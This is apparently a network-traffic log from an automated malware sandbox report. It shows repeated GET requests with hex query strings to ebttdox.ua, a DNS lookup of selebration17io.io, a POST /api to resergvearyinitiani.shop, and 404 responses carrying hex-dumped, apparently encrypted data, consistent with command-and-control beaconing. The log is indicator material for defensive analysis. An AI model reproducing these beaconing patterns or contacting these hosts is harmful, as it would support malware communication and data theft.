                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownDNS traffic detected: queries for: selebration17io.io
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=R0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 39 bf 78 97 a6 a9 11 3b f6 52 dd e7 65 8e 1e 0d d3 13 3f 14 5b 63 17 9e 67 ac 9c cf 95 88 de af bc 62 a8 01 bd ec a9 95 32 96 d1 46 97 ea 13 19 80 03 92 61 c4 86 c5 54 53 7e 30 c6 1c 60 ae 6f 88 72 4b dd 54 f6 b8 1a 45 72 b6 ed f7 a2 3d bf 6c 13 d9 06 80 e3 a7 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 55 2b 98 c3 00 1f 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 12 52 c5 03 45 ca a1 61 7e de f5 45 af 19 17 7e 4f af 9a a5 74 d4 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 df 4a 9a 07 fd ec 31 dc 64 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 1d f2 d1 4f 6b 79 82 ae 9c a7 1c 4c 45 ae ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac c7 bc c4 55 25 af ba 68 b2 59 e2 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 b4 5f 40 db 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 29 97 aa 1b 6f d3 cb 29 32 32 fa 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 a7 d0 1f e4 a6 4d 0d 9f 10 8f d9 b0 99 19 84 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb 45 fa 17 28 d2 de 5b 1f d0 83 aa 7a 8f a2 76 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 ad 88 71 4a ba 80 7e 31 a6 70 d4 03 eb b2 98 76 6c 0f ca 82 b9 38 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 21 6f 11 18 3a 1d f8 8d a3 ae 88 c1 d4 bf 33 25 77 da a9 c3 90 d5 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 d9 3d fb d8 ea 94 62 97 52 b9 c5 ea 9e 13 c8 a6 4c 45 e5 f0 73 8d c1 c4 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 02 03 81 56 51 aa 5d 55 fe df 3c 42 66 98 de 9e 73 3f a8 65 a2 df 1f 78 60 be 2d 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 90 e9 f3 72 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 01 2e a8 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f c5 de fa e0 3d b8 71 cd 37 33 33 95 9f 33 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 01 25 5b fd 51 19 d0 37 1a 45 b1 15 22 18 cb 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 15 ea ac 7b 1a 45 f7 ff 78 7d 17 db 14 91 3d 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 69 5b 17 52 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 90 4a bf 72 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae dc ad 04 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 bf 24 3c 27 d4 39 b1 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 64 3c 43 40 77 eb c1 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 9c 18 5b d2 63 eb 96 48 90 b8 1b 6f f3 c3 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 eb bf 3a b0 9c 11 c0 af e4 1f e4 a6 2d 07 9f 10 bb d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 4a 7a 2b b7 6b 0b 78 21 1d 3c 28 d2 ce 51 1f d0 c9 81 7a 8f f0 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e 61 bc 70 d4 03 3b ee 98 76 72 0f ca 82 a1 0e 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 90 36 80 88 c1 34 e3 33 25 53 d3 a9 c3 62 e3 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
